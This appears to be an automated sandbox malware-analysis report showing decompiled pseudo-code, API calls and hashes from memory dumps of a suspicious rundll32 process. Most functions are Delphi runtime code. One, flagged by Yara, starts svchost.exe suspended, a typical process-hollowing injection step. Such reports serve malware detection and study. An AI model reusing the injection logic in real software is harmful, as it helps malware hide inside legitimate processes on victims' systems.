                                            				 *0x30001933 =  *0x30001933 + 0x34;
                                            				 *0x30001933 =  *0x30001933 + 0x34;
                                            				asm("lodsb");
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				 *((intOrPtr*)(0x70001931 + __esi)) =  *((intOrPtr*)(0x70001931 + __esi)) + __edx;
                                            				asm("sbb [eax], eax");
                                            				 *0x30001933 =  *0x30001933 + 0x34;
                                            				 *0x30001933 =  *0x30001933 + 0x34;
                                            				asm("sbb [eax], eax");
                                            				asm("enter 0x1933, 0x0");
                                            				 *0x30001933 =  *0x30001933 + 0x34;
                                            				 *0x30001933 =  *0x30001933 + 0x34;
                                            				asm("movsb");
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				 *0x30001933 =  *0x30001933 + __edx;
                                            				 *0x30001933 =  *0x30001933 + 0x2d;
                                            				_t137 =  *0x90001931 ^ 0x00000019;
                                            				 *0x30001933 =  *0x30001933 + _t137;
                                            				asm("pushfd");
                                            				 *__ecx =  *__ecx ^ _t206;
                                            				_t138 = _t137 + _t137;
                                            				_t207 = _t206 ^  *__ecx;
                                            				 *0x30001933 =  *0x30001933 + _t138;
                                            				 *0x30001933 =  *0x30001933 + _t138;
                                            				 *0xFFFFFFFFD8003264 =  *((intOrPtr*)(0xffffffffd8003264)) + _t207;
                                            				_t208 = _t207 ^  *__ecx;
                                            				 *0x30001933 =  *0x30001933 + _t138;
                                            				 *0x30001933 =  *0x30001933 + _t138;
                                            				 *((intOrPtr*)(__ecx + __esi + 0x35400019)) =  *((intOrPtr*)(__ecx + __esi + 0x35400019)) + __edx;
                                            				asm("sbb [eax], eax");
                                            				 *0x30001933 =  *0x30001933 + _t138;
                                            				 *0x30001933 =  *0x30001933 + _t138;
                                            				 *__ecx =  *__ecx ^ _t208;
                                            				 *((intOrPtr*)(0x70001931 + __esi + 0x19)) =  *((intOrPtr*)(0x70001931 + __esi + 0x19)) + __ecx;
                                            				 *0x30001933 =  *0x30001933 + _t138;
                                            				asm("invalid");
                                            				asm("sbb [eax], eax");
                                            				if( *0x30001933 >= 0) {
                                            					asm("sbb [eax], eax");
                                            					 *0x30001933 =  *0x30001933 + _t138;
                                            					 *0x30001933 =  *0x30001933 + _t138;
                                            					_push(0x64001931);
                                            					_t186 = _t138 ^ 0x00000019;
                                            					 *0x30001933 =  *0x30001933 + _t186;
                                            					 *0x30001933 =  *0x30001933 + _t186;
                                            					 *((intOrPtr*)(__ecx + __esi + 0x19)) =  *((intOrPtr*)(__ecx + __esi + 0x19)) + _t186;
                                            					 *((intOrPtr*)(0x70001931 + __esi)) =  *((intOrPtr*)(0x70001931 + __esi)) + _t208;
                                            					asm("sbb [eax], eax");
                                            					 *0x30001933 =  *0x30001933 + _t186;
                                            					 *0x30001933 =  *0x30001933 + _t186;
                                            					_push(_t233);
                                            					_push(0x70001931);
                                            					_push(0x18b915);
                                            					_push( *[fs:eax]);
                                            					 *[fs:eax] = 0x70001931;
                                            					 *0x19478c =  *0x19478c + 1;
                                            					_t243 =  *0x19478c;
                                            				}
                                            				if(_t243 == 0) {
                                            					E0018B02C(E0018B4C0(0x194798));
                                            					E0018A448();
                                            					_t222 =  *0x189f20; // 0x189f24
                                            					E00184258(0x19325c, 0x16, _t222);
                                            					_t223 =  *0x189ea0; // 0x189ea4
                                            					E00184258(0x193224, 7, _t223);
                                            					_t224 =  *0x181000; // 0x181004
                                            					E00184258(0x19313c, 2, _t224);
                                            					E00183980(0x193134);
                                            					_t225 =  *0x186590; // 0x186594
                                            					E0018476C(0x194788, _t225);
                                            					_t226 =  *0x18656c; // 0x186570
                                            					E0018476C(0x194784, _t226);
                                            					_t227 =  *0x181000; // 0x181004
                                            					E00184258(0x19474c, 7, _t227);
                                            					_t228 =  *0x181000; // 0x181004
                                            					E00184258(0x194720, 7, _t228);
                                            					_t229 =  *0x181000; // 0x181004
                                            					E00184258(0x194704, 7, _t229);
                                            					_t230 =  *0x181000; // 0x181004
                                            					E00184258(0x1946d4, 0xc, _t230);
                                            					_t231 =  *0x181000; // 0x181004
                                            					E00184258(0x1946a4, 0xc, _t231);
                                            					E00183980(0x1946a0);
                                            					E00183980(0x19469c);
                                            					E00183980(0x194698);
                                            					E00183980(0x194694);
                                            					E00183980(0x19468c);
                                            					E00183980(0x194688);
                                            					E00183980(0x19467c);
                                            					E00183980(0x1930dc);
                                            					E00183F80(0x1930c8);
                                            					E00183980(0x1930c4);
                                            				}
                                            				_pop(_t221);
                                            				 *[fs:eax] = _t221;
                                            				_push(E0018B91C);
                                            				return 0;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeString
                                            • String ID:
                                            • API String ID: 3341692771-0
                                            • Opcode ID: f135dd20bcdab72b8e6185ea21071d3d8e35c6a883942a7dc935659ac2a00788
                                            • Instruction ID: b177fb8021567027777fccf4fbe6d1168709cd7c4358a5f939df9dadbe845265
                                            • Opcode Fuzzy Hash: f135dd20bcdab72b8e6185ea21071d3d8e35c6a883942a7dc935659ac2a00788
                                            • Instruction Fuzzy Hash: E8E1037654E3C08FD7435B7488615863FB0EF53608B5B04EBD490CF1B3E66A5A0ADB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0018BE88() {
                                            				struct HINSTANCE__* _v8;
                                            				intOrPtr _t46;
                                            				void* _t91;
                                            
                                            				_v8 = GetModuleHandleA("oleaut32.dll");
                                            				 *0x1947a0 = E0018BE5C("VariantChangeTypeEx", E0018B9F8, _t91);
                                            				 *0x1947a4 = E0018BE5C("VarNeg", E0018BA28, _t91);
                                            				 *0x1947a8 = E0018BE5C("VarNot", E0018BA28, _t91);
                                            				 *0x1947ac = E0018BE5C("VarAdd", E0018BA34, _t91);
                                            				 *0x1947b0 = E0018BE5C("VarSub", E0018BA34, _t91);
                                            				 *0x1947b4 = E0018BE5C("VarMul", E0018BA34, _t91);
                                            				 *0x1947b8 = E0018BE5C("VarDiv", E0018BA34, _t91);
                                            				 *0x1947bc = E0018BE5C("VarIdiv", E0018BA34, _t91);
                                            				 *0x1947c0 = E0018BE5C("VarMod", E0018BA34, _t91);
                                            				 *0x1947c4 = E0018BE5C("VarAnd", E0018BA34, _t91);
                                            				 *0x1947c8 = E0018BE5C("VarOr", E0018BA34, _t91);
                                            				 *0x1947cc = E0018BE5C("VarXor", E0018BA34, _t91);
                                            				 *0x1947d0 = E0018BE5C("VarCmp", E0018BA40, _t91);
                                            				 *0x1947d4 = E0018BE5C("VarI4FromStr", E0018BA4C, _t91);
                                            				 *0x1947d8 = E0018BE5C("VarR4FromStr", E0018BAB8, _t91);
                                            				 *0x1947dc = E0018BE5C("VarR8FromStr", E0018BB24, _t91);
                                            				 *0x1947e0 = E0018BE5C("VarDateFromStr", E0018BB90, _t91);
                                            				 *0x1947e4 = E0018BE5C("VarCyFromStr", E0018BBFC, _t91);
                                            				 *0x1947e8 = E0018BE5C("VarBoolFromStr", E0018BC68, _t91);
                                            				 *0x1947ec = E0018BE5C("VarBstrFromCy", E0018BCE8, _t91);
                                            				 *0x1947f0 = E0018BE5C("VarBstrFromDate", E0018BD58, _t91);
                                            				_t46 = E0018BE5C("VarBstrFromBool", E0018BDC8, _t91);
                                            				 *0x1947f4 = _t46;
                                            				return _t46;
                                            			}

                                            APIs
                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0018BE91
                                              • Part of subcall function 0018BE5C: 7248FFF6.KERNEL32(00000000), ref: 0018BE75
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: 7248HandleModule
                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                            • API String ID: 3866045432-1918263038
                                            • Opcode ID: 10c2210836f76fa484d306e5d5cc53fdb8b6910ed52d7b2db1c459277ac65d15
                                            • Instruction ID: 127109dbee8dd408b16c3e468830e5d5a8bef6d30049e394d3a7c9f040bcfec3
                                            • Opcode Fuzzy Hash: 10c2210836f76fa484d306e5d5cc53fdb8b6910ed52d7b2db1c459277ac65d15
                                            • Instruction Fuzzy Hash: 20414F6160D3099F53087BED7AE186773C8D705B103A0402BB118ABB65EF30AF868F79
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E0018AC00(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                            				char _v8;
                                            				char _v12;
                                            				char _v16;
                                            				char _v20;
                                            				char _v24;
                                            				char _v28;
                                            				char _v32;
                                            				char _v36;
                                            				char _v40;
                                            				char _v44;
                                            				char _v48;
                                            				char _v52;
                                            				char _v56;
                                            				char _v60;
                                            				char _v64;
                                            				char _v68;
                                            				void* _t104;
                                            				void* _t111;
                                            				void* _t133;
                                            				intOrPtr _t183;
                                            				intOrPtr _t193;
                                            				intOrPtr _t194;
                                            
                                            				_t191 = __esi;
                                            				_t190 = __edi;
                                            				_t193 = _t194;
                                            				_t133 = 8;
                                            				do {
                                            					_push(0);
                                            					_push(0);
                                            					_t133 = _t133 - 1;
                                            				} while (_t133 != 0);
                                            				_push(__ebx);
                                            				_push(_t193);
                                            				_push(0x18aecb);
                                            				_push( *[fs:eax]);
                                            				 *[fs:eax] = _t194;
                                            				E0018AA8C();
                                            				E001895FC(__ebx, __edi, __esi);
                                            				_t196 =  *0x194748;
                                            				if( *0x194748 != 0) {
                                            					E001897D4(__esi, _t196);
                                            				}
                                            				_t132 = GetThreadLocale();
                                            				E0018954C(_t43, 0, 0x14,  &_v20);
                                            				E001839D4(0x19467c, _v20);
                                            				E0018954C(_t43, 0x18aee0, 0x1b,  &_v24);
                                            				 *0x194680 = E00186AC0(0x18aee0, 0, _t196);
                                            				E0018954C(_t132, 0x18aee0, 0x1c,  &_v28);
                                            				 *0x194681 = E00186AC0(0x18aee0, 0, _t196);
                                            				 *0x194682 = E00189598(_t132, 0x2c, 0xf);
                                            				 *0x194683 = E00189598(_t132, 0x2e, 0xe);
                                            				E0018954C(_t132, 0x18aee0, 0x19,  &_v32);
                                            				 *0x194684 = E00186AC0(0x18aee0, 0, _t196);
                                            				 *0x194685 = E00189598(_t132, 0x2f, 0x1d);
                                            				E0018954C(_t132, "m/d/yy", 0x1f,  &_v40);
                                            				E00189884(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                            				E001839D4(0x194688, _v36);
                                            				E0018954C(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                            				E00189884(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                            				E001839D4(0x19468c, _v44);
                                            				 *0x194690 = E00189598(_t132, 0x3a, 0x1e);
                                            				E0018954C(_t132, 0x18af14, 0x28,  &_v52);
                                            				E001839D4(0x194694, _v52);
                                            				E0018954C(_t132, 0x18af20, 0x29,  &_v56);
                                            				E001839D4(0x194698, _v56);
                                            				E00183980( &_v12);
                                            				E00183980( &_v16);
                                            				E0018954C(_t132, 0x18aee0, 0x25,  &_v60);
                                            				_t104 = E00186AC0(0x18aee0, 0, _t196);
                                            				_t197 = _t104;
                                            				if(_t104 != 0) {
                                            					E00183A18( &_v8, 0x18af38);
                                            				} else {
                                            					E00183A18( &_v8, 0x18af2c);
                                            				}
                                            				E0018954C(_t132, 0x18aee0, 0x23,  &_v64);
                                            				_t111 = E00186AC0(0x18aee0, 0, _t197);
                                            				_t198 = _t111;
                                            				if(_t111 == 0) {
                                            					E0018954C(_t132, 0x18aee0, 0x1005,  &_v68);
                                            					if(E00186AC0(0x18aee0, 0, _t198) != 0) {
                                            						E00183A18( &_v12, 0x18af54);
                                            					} else {
                                            						E00183A18( &_v16, 0x18af44);
                                            					}
                                            				}
                                            				_push(_v12);
                                            				_push(_v8);
                                            				_push(":mm");
                                            				_push(_v16);
                                            				E00183CDC();
                                            				_push(_v12);
                                            				_push(_v8);
                                            				_push(":mm:ss");
                                            				_push(_v16);
                                            				E00183CDC();
                                            				 *0x19474a = E00189598(_t132, 0x2c, 0xc);
                                            				_pop(_t183);
                                            				 *[fs:eax] = _t183;
                                            				_push(E0018AED2);
                                            				return E001839A4( &_v68, 0x10);
                                            			}


























                                            APIs
                                            • GetThreadLocale.KERNEL32(00000000,0018AECB,?,?,00000000,00000000), ref: 0018AC36
                                              • Part of subcall function 0018954C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0018956A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Locale$InfoThread
                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                            • API String ID: 4232894706-2493093252
                                            • Opcode ID: 6b00977d40f1505c5b6222bf8e16c27a23d407878e7a468d71dd3d5c7c69086b
                                            • Instruction ID: 0baa4a12cec56b7fad1e9a3409554ed35d27c73e47b36d26dba2bb28344450e5
                                            • Opcode Fuzzy Hash: 6b00977d40f1505c5b6222bf8e16c27a23d407878e7a468d71dd3d5c7c69086b
                                            • Instruction Fuzzy Hash: 26615270B001089BEB05FBA4DD91AEE77AA9F99300F548436F201AB746CB39DF069F51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E0018CFF4(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                            				char _v260;
                                            				char _v768;
                                            				char _v772;
                                            				short* _v776;
                                            				intOrPtr _v780;
                                            				char _v784;
                                            				signed int _v788;
                                            				signed short* _v792;
                                            				char _v796;
                                            				char _v800;
                                            				intOrPtr* _v804;
                                            				void* __ebp;
                                            				signed char _t47;
                                            				signed int _t54;
                                            				void* _t62;
                                            				intOrPtr* _t73;
                                            				intOrPtr* _t91;
                                            				void* _t93;
                                            				void* _t95;
                                            				void* _t98;
                                            				void* _t99;
                                            				intOrPtr* _t108;
                                            				void* _t112;
                                            				intOrPtr _t113;
                                            				char* _t114;
                                            				void* _t115;
                                            
                                            				_t100 = __ecx;
                                            				_v780 = __ecx;
                                            				_t91 = __edx;
                                            				_v776 = __eax;
                                            				if(( *(__edx + 1) & 0x00000020) == 0) {
                                            					E0018CC34(0x80070057);
                                            				}
                                            				_t47 =  *_t91;
                                            				if((_t47 & 0x00000fff) != 0xc) {
                                            					_push(_t91);
                                            					_push(_v776);
                                            					L0018B9E8();
                                            					return E0018CC34(_v776);
                                            				} else {
                                            					if((_t47 & 0x00000040) == 0) {
                                            						_v792 =  *((intOrPtr*)(_t91 + 8));
                                            					} else {
                                            						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                                            					}
                                            					_v788 =  *_v792 & 0x0000ffff;
                                            					_t93 = _v788 - 1;
                                            					if(_t93 < 0) {
                                            						L9:
                                            						_push( &_v772);
                                            						_t54 = _v788;
                                            						_push(_t54);
                                            						_push(0xc);
                                            						L0018BE3C();
                                            						_t113 = _t54;
                                            						if(_t113 == 0) {
                                            							E0018C98C(_t100);
                                            						}
                                            						E0018CF4C(_v776);
                                            						 *_v776 = 0x200c;
                                            						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                            						_t95 = _v788 - 1;
                                            						if(_t95 < 0) {
                                            							L14:
                                            							_t97 = _v788 - 1;
                                            							if(E0018CF68(_v788 - 1, _t115) != 0) {
                                            								L0018BE54();
                                            								E0018CC34(_v792);
                                            								L0018BE54();
                                            								E0018CC34( &_v260);
                                            								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                            							}
                                            							_t62 = E0018CF98(_t97, _t115);
                                            						} else {
                                            							_t98 = _t95 + 1;
                                            							_t73 =  &_v768;
                                            							_t108 =  &_v260;
                                            							do {
                                            								 *_t108 =  *_t73;
                                            								_t108 = _t108 + 4;
                                            								_t73 = _t73 + 8;
                                            								_t98 = _t98 - 1;
                                            							} while (_t98 != 0);
                                            							do {
                                            								goto L14;
                                            							} while (_t62 != 0);
                                            							return _t62;
                                            						}
                                            					} else {
                                            						_t99 = _t93 + 1;
                                            						_t112 = 0;
                                            						_t114 =  &_v772;
                                            						do {
                                            							_v804 = _t114;
                                            							_push(_v804 + 4);
                                            							_t18 = _t112 + 1; // 0x1
                                            							_push(_v792);
                                            							L0018BE44();
                                            							E0018CC34(_v792);
                                            							_push( &_v784);
                                            							_t21 = _t112 + 1; // 0x1
                                            							_push(_v792);
                                            							L0018BE4C();
                                            							E0018CC34(_v792);
                                            							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                            							_t112 = _t112 + 1;
                                            							_t114 = _t114 + 8;
                                            							_t99 = _t99 - 1;
                                            						} while (_t99 != 0);
                                            						goto L9;
                                            					}
                                            				}
                                            			}






























                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0018D08D
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0018D0A9
                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0018D0E2
                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0018D15F
                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0018D178
                                            • VariantCopy.OLEAUT32(?), ref: 0018D1AD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                            • String ID:
                                            • API String ID: 351091851-3916222277
                                            • Opcode ID: 6423a5dc90f81aff1093c9aa9c180f8058d4eefe1d170d9c0d492b76d632ee25
                                            • Instruction ID: c0ee33dc5cb862b8162b2ea9a257f13202beed9eecad0e1e1b093cb118523b0b
                                            • Opcode Fuzzy Hash: 6423a5dc90f81aff1093c9aa9c180f8058d4eefe1d170d9c0d492b76d632ee25
                                            • Instruction Fuzzy Hash: 3651E87590162D9FCB26EB68D881BD9B3BDAF58300F4041D5F608E7242DB74AF858FA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E00183804(void* __ecx) {
                                            				long _v4;
                                            				int _t3;
                                            
                                            				if( *0x194044 == 0) {
                                            					if( *0x19302c == 0) {
                                            						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                            					}
                                            					return _t3;
                                            				} else {
                                            					if( *0x194218 == 0xd7b2 &&  *0x194220 > 0) {
                                            						 *0x194230();
                                            					}
                                            					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                            					return WriteFile(GetStdHandle(0xfffffff5), E0018388C, 2,  &_v4, 0);
                                            				}
                                            			}






                                            APIs
                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,00192E04,00000000,?,001838D2,?,?,00194630,?,?,001930B4,0018561D,00192E04), ref: 0018383D
                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,00192E04), ref: 00183843
                                            • GetStdHandle.KERNEL32(000000F5,0018388C,00000002,00192E04,00000000,00000000,?,001838D2,?,?,00194630,?,?,001930B4,0018561D,00192E04), ref: 00183858
                                            • WriteFile.KERNEL32(00000000,000000F5,0018388C,00000002,00192E04), ref: 0018385E
                                            • MessageBoxA.USER32 ref: 0018387C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: FileHandleWrite$Message
                                            • String ID: Error$Runtime error at 00000000
                                            • API String ID: 1570097196-2970929446
                                            • Opcode ID: 10d042c47066e83017fd8e85cba9ecf66fdccb038a9d2377e8b242a91476bb65
                                            • Instruction ID: 7f0bfe29fde91f219c3af5a5d880a8dc7ae8ffda524a5e5a673efbc2ec2db9f9
                                            • Opcode Fuzzy Hash: 10d042c47066e83017fd8e85cba9ecf66fdccb038a9d2377e8b242a91476bb65
                                            • Instruction Fuzzy Hash: 55F02EA2A803083AEB20B374BC0BF59221CA316F15F28471AB330680D6C7E04BC69F21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00189C40(void* __edx, void* __edi, void* __fp0) {
                                            				void _v1024;
                                            				char _v1088;
                                            				long _v1092;
                                            				void* _t12;
                                            				char* _t14;
                                            				intOrPtr _t16;
                                            				intOrPtr _t18;
                                            				intOrPtr _t24;
                                            				long _t32;
                                            
                                            				E00189AB8(_t12,  &_v1024, __edx, __fp0, 0x400);
                                            				_t14 =  *0x193514; // 0x194044
                                            				if( *_t14 == 0) {
                                            					_t16 =  *0x19340c; // 0x18592c
                                            					_t9 = _t16 + 4; // 0xffe8
                                            					_t18 =  *0x194660; // 0x180000
                                            					LoadStringA(E00184840(_t18),  *_t9,  &_v1088, 0x40);
                                            					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                            				}
                                            				_t24 = E00193430; // 0x194214
                                            				E0018271C(E00182854(_t24));
                                            				CharToOemA( &_v1024,  &_v1024);
                                            				_t32 = E00186F00( &_v1024, __edi);
                                            				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                            				return WriteFile(GetStdHandle(0xfffffff4), 0x189d04, 2,  &_v1092, 0);
                                            			}













                                            APIs
                                              • Part of subcall function 00189AB8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00189AD5
                                              • Part of subcall function 00189AB8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00189AF9
                                              • Part of subcall function 00189AB8: GetModuleFileNameA.KERNEL32(00180000,?,00000105), ref: 00189B14
                                              • Part of subcall function 00189AB8: LoadStringA.USER32 ref: 00189BAA
                                            • CharToOemA.USER32 ref: 00189C77
                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 00189C94
                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 00189C9A
                                            • GetStdHandle.KERNEL32(000000F4,00189D04,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 00189CAF
                                            • WriteFile.KERNEL32(00000000,000000F4,00189D04,00000002,?), ref: 00189CB5
                                            • LoadStringA.USER32 ref: 00189CD7
                                            • MessageBoxA.USER32 ref: 00189CED
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                            • String ID:
                                            • API String ID: 185507032-0
                                            • Opcode ID: 3340e7e5b14ee44cbafcb8a49791b1a37bf5590ccf5e0d787152e9cda0090507
                                            • Instruction ID: 3d914bda600e39c9a6e9e4f82915e3d3b2af8d55a9a0f7883d841c26edccb948
                                            • Opcode Fuzzy Hash: 3340e7e5b14ee44cbafcb8a49791b1a37bf5590ccf5e0d787152e9cda0090507
                                            • Instruction Fuzzy Hash: 6B1170B2154204AED700F794DC82F9B77ECAB55700F808516B754D70E2DB70EB448F66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E001C2C40(void** _a4, intOrPtr* _a8) {
                                            				struct _PROCESS_INFORMATION _v20;
                                            				struct _STARTUPINFOA _v88;
                                            				char _v348;
                                            
                                            				E001C14A0( &_v88, 0, 0x44);
                                            				_v88.cb = 0x44;
                                            				GetEnvironmentVariableA("SystemRoot",  &_v348, 0x104);
                                            				lstrcatA( &_v348, "\\System32\\svchost.exe");
                                            				if(CreateProcessA(0,  &_v348, 0, 0, 0, 0x424, 0, 0,  &_v88,  &_v20) != 0) {
                                            					 *_a4 = _v20.hProcess;
                                            					 *_a8 = _v20.hThread;
                                            					return 1;
                                            				}
                                            				return 0;
                                            			}







                                            APIs
                                            • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 001C2C71
                                            • lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 001C2C83
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 001C2CA9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateEnvironmentProcessVariablelstrcat
                                            • String ID: D$SystemRoot$\System32\svchost.exe
                                            • API String ID: 3510847443-1175289849
                                            • Opcode ID: a472c2e132e29c18831a00b27ff3670320664c3c682e963ca08aed91ccd02d59
                                            • Instruction ID: a8a7874e1bb604df64787b91e8384667d5ec7a407dcc174286ae78a006256d18
                                            • Opcode Fuzzy Hash: a472c2e132e29c18831a00b27ff3670320664c3c682e963ca08aed91ccd02d59
                                            • Instruction Fuzzy Hash: 1F015271A84308ABE710CFD0DC46FE97778EB54705F104058FB09AE2C0E7B4AA488B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E00181A2C() {
                                            				void* _t2;
                                            				void* _t3;
                                            				void* _t14;
                                            				intOrPtr* _t19;
                                            				intOrPtr _t23;
                                            				intOrPtr _t26;
                                            				intOrPtr _t28;
                                            
                                            				_t26 = _t28;
                                            				if( *0x1945bc == 0) {
                                            					return _t2;
                                            				} else {
                                            					_push(_t26);
                                            					_push(E00181B02);
                                            					_push( *[fs:edx]);
                                            					 *[fs:edx] = _t28;
                                            					if( *0x194045 != 0) {
                                            						_push(0x1945c4);
                                            						L001812C4();
                                            					}
                                            					 *0x1945bc = 0;
                                            					_t3 =  *0x19461c; // 0x3d76a8
                                            					LocalFree(_t3);
                                            					 *0x19461c = 0;
                                            					_t19 =  *0x1945e4; // 0x3d8cdc
                                            					while(_t19 != 0x1945e4) {
                                            						_t1 = _t19 + 8; // 0x1fd0000
                                            						VirtualFree( *_t1, 0, 0x8000);
                                            						_t19 =  *_t19;
                                            					}
                                            					E0018132C(0x1945e4);
                                            					E0018132C(0x1945f4);
                                            					E0018132C(0x194620);
                                            					_t14 =  *0x1945dc; // 0x3d86a8
                                            					while(_t14 != 0) {
                                            						 *0x1945dc =  *_t14;
                                            						LocalFree(_t14);
                                            						_t14 =  *0x1945dc; // 0x3d86a8
                                            					}
                                            					_pop(_t23);
                                            					 *[fs:eax] = _t23;
                                            					_push(0x181b09);
                                            					if( *0x194045 != 0) {
                                            						_push(0x1945c4);
                                            						L001812CC();
                                            					}
                                            					_push(0x1945c4);
                                            					L001812D4();
                                            					return 0;
                                            				}
                                            			}











                                            APIs
                                            • RtlEnterCriticalSection.KERNEL32(001945C4,00000000,00181B02), ref: 00181A59
                                            • LocalFree.KERNEL32(003D76A8,00000000,00181B02), ref: 00181A6B
                                            • VirtualFree.KERNEL32(01FD0000,00000000,00008000,003D76A8,00000000,00181B02), ref: 00181A8A
                                            • LocalFree.KERNEL32(003D86A8,01FD0000,00000000,00008000,003D76A8,00000000,00181B02), ref: 00181AC9
                                            • RtlLeaveCriticalSection.KERNEL32(001945C4,00181B09,003D76A8,00000000,00181B02), ref: 00181AF2
